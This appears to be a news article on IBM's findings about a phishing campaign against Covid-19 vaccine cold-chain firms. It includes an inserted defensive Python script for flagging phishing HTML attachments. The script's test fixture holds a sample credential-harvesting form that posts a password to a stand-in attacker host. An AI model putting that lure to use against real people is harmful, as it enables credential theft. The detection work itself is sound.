Since the Covid-19 pandemic began, hackers and scammers have focused extraordinary attention on it, whether for espionage or for grift. Now, as pharmaceutical companies prepare to ship long-awaited vaccines, a new round of sophisticated phishing attacks is focused on the complex supply chain that will get them to people in need.
Two of the leading Covid-19 vaccine candidates, by Pfizer and Moderna, have been submitted to the FDA for emergency authorization; the agency is scheduled to evaluate Pfizer’s application on December 10, and Moderna’s one week later. UK regulators approved Pfizer’s vaccine on Wednesday. The next challenge for both vaccines is transporting them. They must be kept at frigid temperatures, minus 4 degrees Fahrenheit for Moderna and minus 94 for Pfizer, which requires a network of specialists known as the “cold chain.” Today, security researchers at IBM are releasing findings that a campaign has for months targeted a significant number of those companies, across six different countries.
“This activity took place in September, which means that someone’s looking to get ahead, looking to be where they need to be at the critical moment,” says Claire Zaboeva, senior cyber threat analyst with IBM Security X-Force. “It’s the first time we’ve seen that level of pre-positioning within the context of the pandemic.”
The campaign seems to have focused on companies and organizations associated with Gavi, the Vaccine Alliance’s Cold Chain Equipment Optimization Platform, an effort to streamline and strengthen the cold chain. The only target IBM identified by name was the European Commission’s Directorate-General for Taxation and Customs Union, which among other things determines tax relief associated with transporting vaccines across borders. Seemingly any part of the cold chain was fair game for the attackers. Other targets mentioned by IBM include manufacturers of solar panels, which might power trucks carrying the vaccine to more remote locations, and a German website developer whose clients include pharmaceutical, biotech, and container transport companies.
The attackers sent emails purporting to be from Haier Biomedical, a Chinese company that advertises itself as “the world’s only complete cold chain provider,” under the guise of routine requests for quotations. The emails carried HTML attachments that asked the recipient to enter their credentials; anything typed in could then be harvested and used to log in to the targeted company. Because the phishing page arrives as an attachment and renders locally rather than behind a link, URL-based mail filtering alone does nothing to stop it; the credentials still leave the machine when the form is submitted.
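The lure described above is a general technique, and the check below is one way a mail gateway or analyst could triage HTML attachments for it. This is an added example, not IBM’s tooling and not code from the campaign; the sample attachment, its hostname and its field names are constructed for illustration.

```python
"""Added example: heuristics for flagging credential-harvesting HTML attachments.

Not IBM's tooling and not from the article. The sample attachment below is
constructed for illustration (hostname and field names are assumptions).
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed lure: a "secured document" page that asks for a password and
# posts it to an attacker-controlled host (hostname is made up).
SAMPLE_ATTACHMENT = """
<html><body>
<h2>Request for Quotation - Document Secured</h2>
<p>Please sign in with your email account to view the attached RFQ.</p>
<form method="POST" action="https://collector.example.invalid/submit.php">
  <input type="email" name="email">
  <input type="password" name="passwd">
  <input type="submit" value="View Document">
</form>
</body></html>
"""

# Constructed benign sample: a plain quotation table, no form at all.
BENIGN_ATTACHMENT = (
    "<html><body><table><tr><td>Item</td><td>Qty</td></tr></table></body></html>"
)


class _FormScanner(HTMLParser):
    """Collects form targets, password fields and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.password_inputs = 0
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lowercases tag and attribute names
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def scan_html_attachment(html, sender_domain=None):
    """Return indicator strings found in an HTML attachment; [] means clean.

    sender_domain: if given, form posts to that domain (or a subdomain of it)
    are not treated as off-site.
    """
    p = _FormScanner()
    p.feed(html)
    findings = []
    if p.password_inputs:
        findings.append(f"password-input:{p.password_inputs}")
    for action in p.form_actions:
        host = urlparse(action).hostname  # None for relative actions
        if host and (sender_domain is None or not host.endswith(sender_domain)):
            findings.append(f"form-posts-offsite:{host}")
    # Inline script that submits or transmits data is another exfil path
    # for lures that avoid a plain <form action>.
    js = "\n".join(p.scripts)
    if re.search(r"(XMLHttpRequest|fetch\s*\(|\.submit\s*\()", js):
        findings.append("script-submits-data")
    return findings


def classify(html, sender_domain=None):
    """'suspicious' when a password field is paired with an exfiltration path."""
    f = scan_html_attachment(html, sender_domain)
    asks_password = any(x.startswith("password-input") for x in f)
    exfil = any(x.startswith("form-posts-offsite") or x == "script-submits-data" for x in f)
    return "suspicious" if asks_password and exfil else "clean"


if __name__ == "__main__":
    print(scan_html_attachment(SAMPLE_ATTACHMENT), classify(SAMPLE_ATTACHMENT))
    print(scan_html_attachment(BENIGN_ATTACHMENT), classify(BENIGN_ATTACHMENT))
```

The scoring deliberately requires both a password field and somewhere for the data to go; a password field alone also appears in legitimate offline forms, and an off-site form post alone is common in HTML newsletters. Passing the purported sender’s domain lets the rule treat a form that posts back to that domain as lower risk, though for a spoofed sender that domain itself is untrusted.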
IBM says it doesn’t know if any of the attacks were successful or what the ultimate objective of the campaign might be. “The door is really open,” says Zaboeva. “Once you get the keys to the kingdom, and you’re inside the city walls or on the network, there’s a myriad of objectives that you can attain, whether it’s critical information—like timetables and distribution—or disruptive attacks.”
In a way, the attacks are simply an evolution of what Covid-19 researchers have already been facing for months. In July, officials from the US, UK, and Canada called out Russian hackers for zeroing in on vaccine development. China has also been implicated in an attempt against Moderna this summer. Just this week, The Wall Street Journal reported that apparent North Korean hackers attempted to break into nine health organizations, including pharmaceutical giants Johnson & Johnson and AstraZeneca.
The sustained cyberassault on companies and organizations working on Covid-19 research and vaccines is unsurprising, given the stakes. But the shift in focus to the cold chain is cause for particular concern, given the delicate and urgent nature of vaccine deployment.
“As we shift towards distributing a vaccine for Covid-19, the logistics of this operation will become extremely critical,” says John Hultquist, senior director of analysis at Mandiant Threat Intelligence. “Seemingly mundane security issues could have major repercussions to such a complex and important effort.”